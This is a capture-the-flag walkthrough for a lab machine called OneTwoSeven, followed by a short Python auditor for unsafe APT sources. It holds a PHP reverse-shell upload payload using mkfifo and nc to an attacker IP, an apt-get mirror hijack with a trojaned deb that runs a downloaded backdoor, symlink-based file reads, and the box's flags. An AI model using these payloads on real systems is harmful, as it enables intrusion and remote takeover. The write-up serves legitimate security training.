[Meachines] [Hard] OneTwoSeven SFTP-Symlinks+SWP+SSH-forward+apt-get-PE+Tyrant
Word count: 841, 2025-08-29 22:41:38
OneTwoSeven penetration testing walkthrough
Reconnaissance
Initial scan
- Target IP: 10.10.10.133
- Open ports:
  - TCP 22 (SSH - OpenSSH 9.2p1 Debian 2+deb12u1)
  - TCP 80 (HTTP - Apache httpd 2.4.25)
Scan command
ip='10.10.10.133'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//');
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
        nmap -Pn -sV -sC -p "$ports" "$ip";
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
    fi;
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi
Web application analysis
Discovered pages
- http://10.10.10.133/index.php
- http://10.10.10.133/signup.php
SFTP access and credential guessing
Username and password generation scheme
- The password is the first 8 characters of the MD5 hash of the user's IP address
- The username is "ots-" followed by a slice of the Base64 encoding of that md5sum output
Generating the credentials for the local (127.0.0.1) user
echo -n "127.0.0.1" | md5sum | cut -c-8 # password: f528764d
echo -n "127.0.0.1" | md5sum | base64 | cut -c4-11 # username: ots-yODc2NGQ (prefix ots- added)
SFTP login
sftp ots-yODc2NGQ@10.10.10.133
Password: f528764d
Exploiting the SFTP symlink weakness
Reading /etc/passwd
sftp> symlink /etc/passwd passwd
curl 'http://onetwoseven.htb/~ots-yODc2NGQ/passwd'
Exposing the root directory
sftp> symlink / root.
Browse to: http://onetwoseven.htb/~ots-yODc2NGQ/root./
Recovering the .swp file
wget http://onetwoseven.htb/~ots-yODc2NGQ/root./var/www/html-admin/.login.php.swp
vim -r .login.php.swp
SSH port forwarding
Setting up a SOCKS proxy
ssh -N -D 1090 ots-yODc2NGQ@10.10.10.133
OTS Addon Manager exploitation
Vulnerability analysis
- The URL is checked for the string /addons/; if it is present, direct access is blocked
- The check is bypassed with a dummy path parameter appended to the script name
Exploitation
POST /addon-download.php?a=/addon-upload.php/ HTTP/1.1
Host: 127.0.0.1:60080
[...]
------WebKitFormBoundaryphFWTRQZGfBr7typ
Content-Disposition: form-data; name="addon"; filename="1.php"
Content-Type: application/x-php
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f')
------WebKitFormBoundaryphFWTRQZGfBr7typ--
Privilege escalation: apt-get DNS hijacking
Attack steps
- Identify the APT source configuration:
cat /etc/apt/sources.list.d/onetwoseven.list
- Set up the DNS hijack:
echo '10.10.16.27 packages.onetwoseven.htb' >> /etc/hosts
- Set up the proxy server:
pip install --upgrade proxy.py
proxy --hostname 0.0.0.0 --port 10000
- Configure the proxy on the target machine:
export http_proxy=http://10.10.16.27:10000
- Build the malicious deb package:
wget http://ftp.de.debian.org/debian/pool/main/n/netkit-telnet/telnet_0.17-42_amd64.deb
dpkg-deb -R telnet_0.17-42_amd64.deb evil_deb
vim ./evil_deb/DEBIAN/postinst # add a line that runs /tmp/tyrant
dpkg-deb -b ./evil_deb/ telnet_0.17-42_amd64.deb
- Generate the Packages file:
Package: telnet
Version: 0.17-42
[...]
Filename: pool/DEBIAN/main/n/netkit-telnet/telnet_0.17-42_amd64.deb
Size: 71028
MD5sum: 09c8645d8775a4ea3e2e2a9d4cafabdc
SHA256: a93b2287e52518446a4f8097a8a3a605e41a4242a8b9555c08b0d7b4c3f83e73
- Generate the Release file:
Origin: Devuan
Label: Devuan
Suite: stable
Version: 2.0.0
[...]
SHA256:
2c0affea6242c314455189272c7755d261104a66426476e43121433173214516 697 main/binary-amd64/Packages
8fec70cc6b2d80ad6bb874acb975e32134d81614b70080213b6826aaf58789a3 493 main/binary-amd64/Packages.gz
- Set up the repository directory structure:
mkdir -p devuan/dists/ascii/main/binary-amd64/
mkdir -p devuan/pool/DEBIAN/main/n/netkit-telnet/
cp telnet_0.17-42_amd64.deb devuan/pool/DEBIAN/main/n/netkit-telnet/
cp Release devuan/dists/ascii/
cp Packages devuan/dists/ascii/main/binary-amd64/
cp Packages.gz devuan/dists/ascii/main/binary-amd64/
python3 -m http.server 80
- Trigger the update and install:
wget https://github.com/MartinxMax/Tyrant/releases/download/version-2.0/tyrant
sudo /usr/bin/apt-get update
sudo /usr/bin/apt-get upgrade
- Run the Tyrant backdoor:
./tyrant -uid 0 -rhost 10.10.16.27 -rport 10031
Credentials and flags obtained
- User flag: a479fec775507b7018411c9dba84a7d6
- Administrator password hash: 11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8
- root flag: 7a5b069b4c8ce1ecb5990d58d64939ba
Summary of key security weaknesses
- The SFTP symlink weakness allows arbitrary file reads
- The OTS Addon Manager dummy-parameter bypass
- Misconfigured APT sources enable the DNS hijacking attack
- Insecure package verification
- Privilege escalation through a malicious deb package
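The last three points come down to how APT sources are configured. As an added defender-side example (not code from the writeup), the function below audits sources.list-style entries and apt.conf settings for the properties that make the mirror hijack above succeed: plain-HTTP mirrors and options that switch off Release signature checks. The input files are constructed samples.

```python
import re

# Constructed sample in the style of /etc/apt/sources.list.d/*.list (not from the box).
SAMPLE_SOURCES = """\
# onetwoseven.list (constructed sample)
deb http://packages.onetwoseven.htb/devuan ascii main
deb [trusted=yes] http://mirror.example.com/debian stable main
deb [signed-by=/usr/share/keyrings/example.gpg] https://deb.example.org/debian bookworm main
deb-src https://deb.example.org/debian bookworm main
"""

# Constructed sample in the style of /etc/apt/apt.conf.d/* (not from the box).
SAMPLE_APT_CONF = """\
Acquire::http::Proxy "http://10.0.0.5:10000/";
Acquire::AllowInsecureRepositories "true";
APT::Get::AllowUnauthenticated "true";
"""

# deb|deb-src, optional [options], then the mirror URI.
SOURCE_RE = re.compile(r'^(deb|deb-src)\s+(?:\[(?P<opts>[^\]]*)\]\s+)?(?P<uri>\S+)')

def audit_sources(text):
    """Return (line_number, finding) pairs for risky sources.list entries."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = SOURCE_RE.match(line)
        if not m:
            continue
        opts = (m.group('opts') or '').lower()
        uri = m.group('uri').lower()
        # A plain-HTTP mirror can be redirected by an /etc/hosts or DNS change,
        # as in the writeup; only the Release signature then protects the client.
        if uri.startswith('http://'):
            findings.append((n, 'plain-http mirror'))
        # trusted=yes disables signature verification for this source, so a
        # forged Packages/Release pair served from the hijacked host is accepted.
        if 'trusted=yes' in opts:
            findings.append((n, 'signature check disabled (trusted=yes)'))
    return findings

def audit_apt_conf(text):
    """Return (line_number, key) pairs for global settings that disable verification."""
    risky = ('Acquire::AllowInsecureRepositories', 'APT::Get::AllowUnauthenticated')
    return [(n, key) for n, raw in enumerate(text.splitlines(), 1)
            for key in risky if raw.strip().startswith(key) and '"true"' in raw]
```

Running both functions over the real files on a host turns the writeup's upgrade path into a checklist: an https or signed-by source with no trusted=yes and no global override would have rejected the forged repository.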